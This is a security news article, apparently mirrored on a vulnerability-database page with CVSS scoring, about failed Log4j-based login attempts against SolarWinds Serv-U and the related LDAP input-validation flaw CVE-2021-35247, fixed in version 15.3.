Lucene search

K
threatpostLisa VaasTHREATPOST:187B01687ED5D3975CD6E42E84DD9B13
HistoryJan 20, 2022 - 6:39 p.m.

Microsoft: Attackers Tried to Login to SolarWinds Serv-U Via Log4j Bug

2022-01-2018:39:21
Lisa Vaas
threatpost.com
184
microsoft
solarwinds
serv-u
log4j
attackers
vulnerability
exploitation
ldap
cve-2021-35247

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.968

Percentile

99.7%

Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j  flaws.

This is a confusing story: Initially,  Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.

SolarWinds had issued a fix the day before, on Tuesday.

SolarWinds subsequently reached out to Threatpost  and other news outlets on Thursday to clarify that Microsoft’s report referred  to a threat actor attempting to login to Serv-U using the Log4j vulnerability. The attempt failed, given that Serv-U doesn’t use  Log4j code and the target for authentication – LDAP (Microsoft Active Directory) – isn’t susceptible to Log4j attacks.

The SolarWinds vulnerability, tracked as CVE-2021-35247, is an input validation flaw that could allow attackers to build a query, given some input, and to send that query over the network without sanitation, Microsoft’s Threat Intelligence Center (MSTIC) said.

Password Management Webinar

The bug, discovered by Microsoft’s Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior. SolarWinds fixed the vulnerability in Serv-U version 15.3, released on Tuesday.

“The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,” SolarWinds said in its advisory, adding that it had updated the input mechanism “to perform additional validation and sanitization.”

Microsoft security researcher Jonathan Bar Or, credited with discovering the bug, explained that he had seen attacks coming from serv-u.exe while hunting for log4j exploit attempts. “Taking a closer looked revealed you could feed Serv-U with data and it’ll build a LDAP query with your unsanitized input!” he said. “This could be used for log4j attack attempts, but also for LDAP injection.”

A SolarWinds representative told Threatpost that the attacker wasn’t able to login to Serv-U, and that the Microsoft researcher was referencing attempted logins that failed, since Serv-U doesn’t leverage Log4J code.
SolarWinds said that it hasn’t seen any “downstream [effect]” of the bug, given that “the LDAP servers ignored improper characters.”

For its part, MSTIC didn’t give details about the attack it observed.

Just the Latest in Ongoing Log4j Barrage

The Serv-U attacks are just the latest in the rampant Log4j exploit attempts and testing that have been thrown at the multiple flaws in Apache’s Log4j logging library since those flaws were disclosed – and came under near-immediate attack – last month.

On Tuesday, Akamai researchers also reported that they’ve detected evidence of the unauthenticated remote code execution (RCE) vulnerability in Log4j – tracked as CVE-2021-44228 – being adapted to infect and assist in the proliferation of malware used by the Mirai botnet by targeting Zyxel networking devices.

MSTIC strongly recommended that affected customers apply the SolarWinds security updates.

References

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

9.1

Confidence

High

EPSS

0.968

Percentile

99.7%